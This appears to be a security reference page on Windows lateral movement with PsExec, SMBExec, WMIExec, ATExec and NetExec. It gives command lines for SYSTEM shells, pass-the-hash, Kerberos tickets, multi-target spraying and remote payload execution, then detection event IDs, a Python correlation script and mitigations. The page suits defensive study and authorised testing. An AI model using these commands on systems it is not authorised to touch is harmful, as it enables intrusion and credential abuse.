PsExec and WMI

Overview

PsExec and WMI are the two most common lateral movement techniques in Windows environments. PsExec uploads a service binary via SMB, creates and starts a Windows service to execute commands, then cleans up. WMI (Windows Management Instrumentation) executes commands through the WMI service (DCOM port 135 + dynamic ports) without writing files to disk. Both require admin credentials on the target — password, NTLM hash (pass-the-hash), or Kerberos ticket.

ATT&CK Mapping

  • Tactic: TA0002 - Execution
  • Technique: T1047 - Windows Management Instrumentation
  • Tactic: TA0008 - Lateral Movement
  • Technique: T1021.002 - Remote Services: SMB/Windows Admin Shares

Prerequisites

  • Valid credentials with local admin rights on the target
  • Network access to SMB (TCP 445) for PsExec or RPC (TCP 135 + dynamic ports) for WMI
  • For pass-the-hash: NTLM hash instead of plaintext password

Techniques

Impacket PsExec

Creates a service on the target, executes commands as SYSTEM, returns output. Writes a binary to the ADMIN$ share.

# Impacket psexec
# https://github.com/fortra/impacket

# Interactive shell as SYSTEM
impacket-psexec '<domain>/<user>:<password>@<target>'

# Execute a specific command
impacket-psexec '<domain>/<user>:<password>@<target>' 'whoami'

# Pass-the-hash
impacket-psexec '<domain>/<user>@<target>' -hashes ':<NThash>'

# With Kerberos
export KRB5CCNAME=<user>.ccache
impacket-psexec -k -no-pass '<domain>/<user>@<target>'

Impacket SMBExec

Similar to PsExec but does not drop a binary. Creates a service that writes output to a file on a share:

# Impacket smbexec
# https://github.com/fortra/impacket
impacket-smbexec '<domain>/<user>:<password>@<target>'
impacket-smbexec '<domain>/<user>@<target>' -hashes ':<NThash>'

Impacket WMIExec

Executes commands via WMI. Does not create a service or write binaries — stealthier than PsExec:

# Impacket wmiexec
# https://github.com/fortra/impacket

# Interactive shell (runs as the authenticated user, not SYSTEM)
impacket-wmiexec '<domain>/<user>:<password>@<target>'

# Execute a command
impacket-wmiexec '<domain>/<user>:<password>@<target>' 'whoami'

# Pass-the-hash
impacket-wmiexec '<domain>/<user>@<target>' -hashes ':<NThash>'

# With Kerberos
impacket-wmiexec -k -no-pass '<domain>/<user>@<target>'

Impacket ATExec

Executes commands via the Windows Task Scheduler (AT service):

# Impacket atexec
# https://github.com/fortra/impacket
impacket-atexec '<domain>/<user>:<password>@<target>' 'whoami'
impacket-atexec '<domain>/<user>@<target>' -hashes ':<NThash>' 'whoami'

NetExec Execution

# NetExec
# https://github.com/Pennyw0rth/NetExec

# Execute command via SMB (uses wmiexec by default)
nxc smb <target> -u <user> -p <password> -x 'whoami'

# Execute PowerShell command
nxc smb <target> -u <user> -p <password> -X 'Get-Process'

# Pass-the-hash
nxc smb <target> -u <user> -H '<NThash>' -x 'whoami'

# Spray and execute across multiple targets
nxc smb targets.txt -u <user> -p <password> -x 'whoami'

Sysinternals PsExec (from Windows)

:: PsExec (Sysinternals)
:: https://learn.microsoft.com/en-us/sysinternals/downloads/psexec

:: Interactive shell as SYSTEM
PsExec.exe \\<target> -u <domain>\<user> -p <password> -s cmd.exe

:: Execute a command
PsExec.exe \\<target> -u <domain>\<user> -p <password> cmd.exe /c whoami

:: Copy and execute a local binary on the remote target
PsExec.exe \\<target> -u <domain>\<user> -p <password> -c payload.exe

Comparison

Feature          PsExec      SMBExec     WMIExec             ATExec
Protocol         SMB (445)   SMB (445)   RPC (135)           SMB (445)
Runs as          SYSTEM      SYSTEM      Authenticated user  SYSTEM
Writes binary    Yes         No          No                  No
Creates service  Yes         Yes         No                  Creates scheduled task
Detection level  High        Medium      Low                 Low

Detection Methods

Network-Based Detection

  • SMB connections to ADMIN$ or C$ shares from non-admin workstations
  • Service creation over SMB (PsExec creates a service with a random name)
  • WMI/DCOM traffic (TCP 135 + dynamic high ports) between workstations

Host-Based Detection

  • Event ID 7045 — new service installed (PsExec service creation)
  • Event ID 4697 — service installed in the system
  • Event ID 4624 (Type 3) — network logon from unexpected source
  • Event ID 4648 — explicit credentials used for logon
  • Sysmon Event ID 1 — process creation with network logon context
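
To turn the host-based indicators above into a concrete check, the following added Python example (not from the original page) correlates Event ID 7045 service installs with a preceding Event ID 4624 Type 3 network logon on the same host. The event records are constructed dicts, and the random-service-name heuristic and field names are assumptions of the example, not documented PsExec behaviour.

```python
"""Flag PsExec-style service installs (Event ID 7045) that follow a Type 3 network
logon (Event ID 4624) on the same host. Added example; events below are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). Keys loosely mirror event fields.
EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 4624, "host": "WS-042", "logon_type": 3,
     "user": "CORP\\jdoe", "src_ip": "10.0.5.17"},
    {"time": "2024-05-01T10:00:02", "id": 7045, "host": "WS-042",
     "service": "kQzRwXpT", "image_path": "%SystemRoot%\\kQzRwXpT.exe"},
    {"time": "2024-05-01T11:30:00", "id": 4624, "host": "WS-042", "logon_type": 2,
     "user": "CORP\\jdoe", "src_ip": "-"},
    {"time": "2024-05-01T11:30:05", "id": 7045, "host": "WS-042",
     "service": "Vendor Update Service", "image_path": "C:\\Program Files\\Vendor\\svc.exe"},
    {"time": "2024-05-01T12:00:00", "id": 7045, "host": "WS-043",
     "service": "ABCDEFGH", "image_path": "%SystemRoot%\\ABCDEFGH.exe"},
]

# Heuristic (an assumption of this example): the service gets a short, letters-only
# random name and the dropped binary in %SystemRoot% (the ADMIN$ share) carries the
# same name. Tune the pattern and window against your own baseline.
RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")
WINDOW = timedelta(seconds=60)


def looks_psexec_like(service_name, image_path):
    stem = image_path.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
    return (bool(RANDOM_NAME.match(service_name)) and stem == service_name
            and image_path.upper().startswith("%SYSTEMROOT%\\"))


def find_psexec_style(events, window=WINDOW):
    """One alert per suspicious 7045. Severity is 'high' when a Type 3 logon on the
    same host landed within `window` before the install, otherwise 'medium'."""
    net_logons = defaultdict(list)                       # host -> [(time, src_ip)]
    for e in events:
        if e["id"] == 4624 and e.get("logon_type") == 3:
            net_logons[e["host"]].append((datetime.fromisoformat(e["time"]), e["src_ip"]))
    alerts = []
    for e in sorted(events, key=lambda x: x["time"]):
        if e["id"] != 7045 or not looks_psexec_like(e["service"], e["image_path"]):
            continue
        t = datetime.fromisoformat(e["time"])
        src = [ip for lt, ip in net_logons[e["host"]] if timedelta(0) <= t - lt <= window]
        alerts.append({"host": e["host"], "service": e["service"],
                       "severity": "high" if src else "medium",
                       "src_ip": src[-1] if src else None})
    return alerts
```

A 7045 with no correlated network logon still surfaces at medium severity, so a service created from a local console session is not silently dropped.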

Mitigation Strategies

  • Restrict admin shares — disable ADMIN$ and C$ where not needed
  • Limit local admin rights — use LAPS (Local Administrator Password Solution) for unique local admin passwords
  • Network segmentation — restrict SMB (445) and RPC (135) between workstations
  • Disable remote WMI access — where it is not needed for management
  • Monitor lateral movement indicators — alert on service creation, remote WMI, and scheduled task creation from unexpected sources
